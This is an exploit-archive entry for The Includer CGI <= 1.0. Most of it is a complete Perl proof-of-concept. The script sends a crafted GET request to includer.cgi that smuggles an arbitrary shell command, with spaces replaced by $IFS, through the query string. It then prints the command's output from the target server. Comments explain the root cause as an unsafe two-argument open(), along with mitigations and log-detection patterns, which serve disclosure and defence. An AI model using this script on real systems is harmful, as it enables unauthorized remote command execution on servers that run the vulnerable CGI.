
The Includer CGI <= 1.0 Remote Command Execution (new version)

Author
GreenwooD
Risk
[
Security Risk Unsorted
]
0day-ID
0day-ID-92
Category
web applications
Date add
07-04-2005
Platform
cgi
==============================================================
The Includer CGI <= 1.0 Remote Command Execution (new version)
==============================================================




                                                                                                                                                                                                                                                               #!/usr/bin/perl

############################################################
# Target - The Includer CGI <= 1.0                         #
#                                                          #
#                                                          #
# Info about bug - Unsafe use of the open() function.      #
#                                                          #
############################################################
use IO::Socket;


# Proof-of-concept client for the command-execution flaw in The Includer CGI
# <= 1.0. It sends one crafted GET request and prints the part of the response
# that lies between two marker lines.
#
# Defender notes:
#  - Root cause, per the header above, is unsafe use of open() in the CGI.
#    Presumably the query string reaches a two-argument Perl open(), where a
#    leading or trailing '|' turns the "file name" into a command to run --
#    the CGI source is not shown here, so confirm against it.
#  - Mitigation: use the three-argument form of open() with an explicit read
#    mode, and resolve the requested include against an allow-list of files
#    instead of passing request data through.
#  - Detection: requests to includer.cgi whose query string contains '|', ';'
#    or the text '$IFS' (see the request built below) stand out in web logs.

# All three positional arguments are required; otherwise print usage and stop.
# (The usage text names the first argument both <target> and <host>.)
if (@ARGV < 3)
{
  print " \n Includer CGI <= 1.0 Network Security Team - nst.void.ru\n\n";
  print " Usage: <target> <dir> <cmd>\n\n"; 
  print "   <host> - Host name of taget.\n";
  print "   <dir> - If not in dir type / symbol.\n";
  print "   <cmd> - command for execution.\n\n";
  print " Examples:\n\n";
  print "   incl_10.pl 127.0.0.1 /cgi-bin/ \"ls -la\"\n";
  print "   incl_10.pl 127.0.0.1 / \"uname -a\"\n";
  print "   incl_10.pl www.test.com / \"ps auxw\"\n";
  exit();
}


# Host argument, with any "http://" removed. The /e modifier evaluates the
# (empty) replacement as code, which still yields an empty string.
$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;

# $dir is used as given and is expected to end in '/' (see the usage text).
# $cmd keeps the command as typed for display; $cmde is the copy that is
# rewritten below before it goes into the request.
$dir = $ARGV[1];
$cmd = $cmde = $ARGV[2];
  
print "\n ===[ Info for query ]========================\n";   
print " = Target: $serv\n";
print " = Dir: $dir\n";
print " = Cmd: $cmd\n";
print " =============================================\n\n";   

# Every space becomes the literal text $IFS (with /e the replacement "\$IFS" is
# evaluated as a Perl string), so the request line carries no raw spaces.
$cmde =~ s/ /"\$IFS"/ge;

# Request line: absolute-URI GET for <dir>includer.cgi, HTTP/1.0. The query
# string starts and ends with '|' and wraps the command between two echo
# statements that emit the markers _N_ and _T_.
$req  = "GET http://$serv";                                      
$req .= "$dir";
$req .= "includer.cgi?|echo\$IFS\"_N_\";$cmde;echo\$IFS\"_T_\"| HTTP/1.0\n\n";


# Plain TCP connection to port 80 (hard-coded); die if it cannot be opened.
$s = IO::Socket::INET->new(Proto=>"tcp",
                           PeerAddr=>"$serv",
                           PeerPort=>80) or die " (-) - Can't connect to the server\n";

print $s $req;

# $flag is set to 1 once the _N_ marker line has been seen.
$flag = 0;

# Read the response line by line. The order of the three tests matters:
#   1. a line containing _T_ (anywhere in the line) prints the footer and exits;
#   2. while $flag is set, the line is echoed;
#   3. a line starting with _N_ prints the header and sets $flag, so the marker
#      line itself is not echoed.
# If _T_ never arrives, the loop ends when the server closes the connection.
while ($ans = <$s>)

 {
   if ($ans =~ /_T_/) { print " =========================================================\n"; exit() }
   if ($flag == 1) { print " $ans"; }
   if ($ans =~ /^_N_/) { print " ===[ Executed command $cmd ]===============================\n"; $flag = 1 }
   
 }


